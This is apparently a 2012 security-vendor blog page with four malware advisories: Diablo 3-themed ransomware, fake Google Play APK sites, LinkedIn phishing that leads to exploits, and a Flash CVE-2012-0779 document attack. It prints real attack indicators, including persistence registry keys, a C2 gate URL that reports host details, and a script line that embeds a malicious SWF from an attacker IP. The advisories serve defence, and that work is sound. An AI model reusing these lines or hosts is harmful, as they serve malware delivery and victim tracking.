12345

6/11/2012

[Caution] Ransomware-typed malicious file disguised as a Diablo 3

1. Introduction

INCA Internet response team detected malicious Ransom-ware disguised as Diablo 3 related file. Ransomware comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed. Ransomware typically propagates as a conventional computer worm, entering a system through, for example, a vulnerability in a network service or a downloaded file. The program will then run a payload which will begin to encrypt personal files on the hard drive.



Ransomware :

Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed.

2. Malicious file info

Diablo III is a dark fantasy/horror-themed action game by Blizzard Entertainment. Before its release, the game broke several presale records and became the most pre-ordered PC game of all time on Amazon.com. With popularity of this game, malicious attackers are using this game for spreading malicious files.


The name of this malicious file is "Diablo_III.exe" same as real Diablo's file. It copies itself in Application Data folder.


Upon executed malicious file, it changes registry to be executed on reboot and blocks to open Windows Task Manager. It changes OS background image and disturbs normal use.

HKLM\Software\Microsoft\Active Setup\Installed Components\{Gusfa7ep-lUCJ-Ed2r-Yvs8-fYwL6tnW7CxX}\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe /ActiveX
 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
 HKCU\Software\Microsoft\Windows\CurrentVersion\Run\9txXqR9p2lPiFxH: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: %Appdata%\Diablo_III.exe
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: %Appdata%\Diablo_III.exe,%WinDir%\System32\userinit.exe,
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
 DisableTaskMgr = "1"

Furthermore, it can change PC's name and OS version name.

hxxp://galbbza.com/partner2/universalpanel/gate.php?hwid=4281525696&pc=COMPUTERNAME&localip=192.168.0.1&winver=Windows XP Professional x32

Following figure is a case of disguised as GVU or official web site of Gesellschaft zur Verfolgung von Urheberrechtsverletzungen( German association that investigates cases of software, music, and motion picture copyright infringement)

http://www.gvu.de/index.php?id=39



Due to malicious file, following run screen will be shown. All input devices will be blocked except field for input code. To get code, victims need to pay 50EURO.


Various types of ransomware have been spread. The most popular technique is disguising as sent from a police or public institutions. It says that victim's PC was infected malicious behaviors and did illegal behaviors. User must need to pay in 24 hours, otherwise it will format all data in HDD.

Following figure is a page for ransomware.


3. Summary

These malicious files have been spread via hacked overseas web site and use MS OS/Office, Adobe Flash Player/Reader, and JAVA exploit. To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function "ON"
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.

6/08/2012

[Warning] Spreading malicious files via fake Google play market

1. Information

INCA Internet response team detected malicious APK files are spreading from certain fake Google play site. Not only for this case, had we reported various cases including shortened URL service on SNS and famous streaming video-sharing website. With the increasing number of Android user, security threats are growing at the same time. Therefore, users should notice about malicious files for Android users.



2. Spreading cases and symptom of infection

[Information] Continuous threats of Android malicious files
http://en-erteam.nprotect.com/2012/04/information-countinuous-threats-of.html


[Issue] Zombie phone on calling for Korean user?
http://en-erteam.nprotect.com/2012/04/issue-zombie-phone-on-calling-for.html

Official address of Google play is https://play.google.com. Language of that site goes with browser's language.


Fake Google play site shows Russian language.


This site shows about 50 famous Android applications for download.
Besides, each app shows installation procedure and tries to be installed with disguising as a normal app.
This site contains several famous Anti-Virus apps.


When user chooses certain area, APK file will be downloading and installed with additional command. All of these apps are malicious APK files and coded same technique including "classes.dex". Only different thing of these files is its icon.




Following phase will be shown on installation.





These malicious files can be detected on our nProtect Mobile for Android.


Not only for this web site, various fake web sites were found.


INCA Internet has detected various Android malicious files on overseas.

Following set of capture images means various abnormal markets are on working.


3. Summary

With the growth of Android users, the number of malicious attackers is also increasing.
There hasn't been actual statistic report or real damage case so far, though; users need to be careful from these security threats. . To use smartphone safely from security threats of these malicious applications, we recommend following tips "Smartphone security management tips" for general users.

Smartphone security management tips

1. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function “ON”
2. Download the proven application by multiple users at all times.
3. Use mobile anti-virus SW to check downloaded application before using it.
4. Do not visit suspicious or unknown site via smartphone.
5. Try not to see MMS, text, e-mail from uncertain user.
6. Set strong password on smartphone always.
7. Turn the wireless interfaces like Bluetooth only be used.
8. Do not save important information on phone.
9. Do not try illegal customizing like rooting or jailbreak.

INCA Internet (Security Response Center / Emergency Response Team) provides diagnosis/treatment function with “nProtect Mobile for Android” for mobile such as malicious file stated above and runs responding system against various security threats.

6/05/2012

[Warning] Malicious personal message from fake LinkedIn friend


1. Information

INCA Internet response team detected malicious e-mail disguised as personal message of LinkedIn, one of SNS services. LinkedIn is a professional social networking website. Founded in December 2002 and launched in May 2003, it is mainly used for professional networking. As of 9 February 2012, LinkedIn reports more than 150 million registered users in more than 200 countries and territories. Malicious e-mails disguised as sent by LinkedIn have been found several times with Ads for Viagra.



This malicious file installs additional malicious files with using various security exploit including Adobe Reader(PDF), Java(JAR)
 
2. Spreading cases and symptom of infection

[Warning] Malicious file about portrait infringement 

There were various malicious e-mails with using SNS. ▶ Notice on Twitter or Facebook ▶ Attached malicious files on notice for changing personal information ▶ Disguised as adding friends. 


The most recent case of being found is disguised as a message sent by LinkedIn Classmate. Of course, it contains malicious links.


These links will direct to certain Bulgarian web site. When user clicks URL to addon.html, malicious script code will be executed.

If accessing malicious web site, follow figure will be shown. It shows such as invitation of Classmate, however; malicious script code will be executed.


"addon.html" contains both LinkedIn related words and certain scripts.


After working script, it will redirect to another site and execute "main.php".

- hxxp://h(~)lub.net/main.php?page=d72ac4be16dd8476

"main.php" will execute "ap2.php", "Edu.jar" and run Adobe Reader Exploit Code Java Applet Exploit Code(CVE-2012-0507).

- hxxp://h(~)lub.net/data/ap2.php : a9513.pdf (file name consists 1-digit alphabet and 4 digits random numbers)
- hxxp://h(~)lub.net/Edu.jar

Upon executed exploit code, it will download additional malicious executable file and will make its clone on Application Data folder.


It can access on certain host and can be damaged by additional attack command of attacker after being infected.


3. Summary

With the growth of SNS users, malicious file creators and distributors are trying to deceive users. To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function.
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.

6/04/2012

[Warning] Malicious file for APT attack using CVE-2012-0779 exploit


1. Introduction

INCA Internet Response team detected attacks using latest Adobe Flash Player exploit (CVE-2012-0779).Especially we found malicious DOC files. With these reasons, users need to maintain latest Adobe Flash Player update to be safe from malicious security threats and need to be careful on downloading attachment from suspicious e-mail.



2. Cases of CVE-2012-0779

Various malicious files using CVE-2012-0779 exploit are found. Following figure shows malicious DOC files.



Malicious e-mail on April 13, 2012

This DOC file used CVE-2012-0779 exploit and is written in Korean. We can assume that this file can be used APT attack in Korea.

File name is "유통관련자료_수정본.doc". Run screen is as following.


This malicious DOC file contains script code which make user's PC access on certain URL. Malicious "exp.swf" is already being installed. Currently this malicious swf has been removed.

[download]
http://(~~)tkorea.com/uploadfiles/upload/exp.swf


This malicious file contains malicious EXE(XOR encoded).
Except this file, there were various malicious file which are written in English.


■ Malicious e-mail on May 03, 2012


"WUC Invitation Letter Guests.doc" contains CVE-2012-0779 exploit. Following figure is run screen.


DOC file includes following script code which can load malicious SWF file.

eval(document.write(unescape('%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001afa0338&infosize=00FC0000%3E%3C/embed%3E')))


After downloading malicious file, following files will be executed in a row.

a. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe

b. C:\Documents and Settings\[user account]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe

c. C:\Documents and Settings\[user account]\Application Data\conime.exe

3. Summary

Official version of Adobe Flash Player 11.2.202.235 is distributing now. To be safe from CVE-2012-0779 exploit, users need to maintain latest update.

[Download]
http://get.adobe.com/kr/flashplayer/


To use PC safely from security threats of these malicious attachments, we recommend you download latest security updates and obey following "Security management tips" for general users.

Security management tips

1. Maintain the latest security update on OS and applications
2. Use anti-virus SW from believable security company and keep updating the latest engine and using real time detecting function “ON”
3. Do not see and download attached file from suspicious e-mail.
4. Keep caution to link from instant messenger and SNS.

INCA Internet (Security Response Center / Emergency Response Team) runs responding system against various security threats.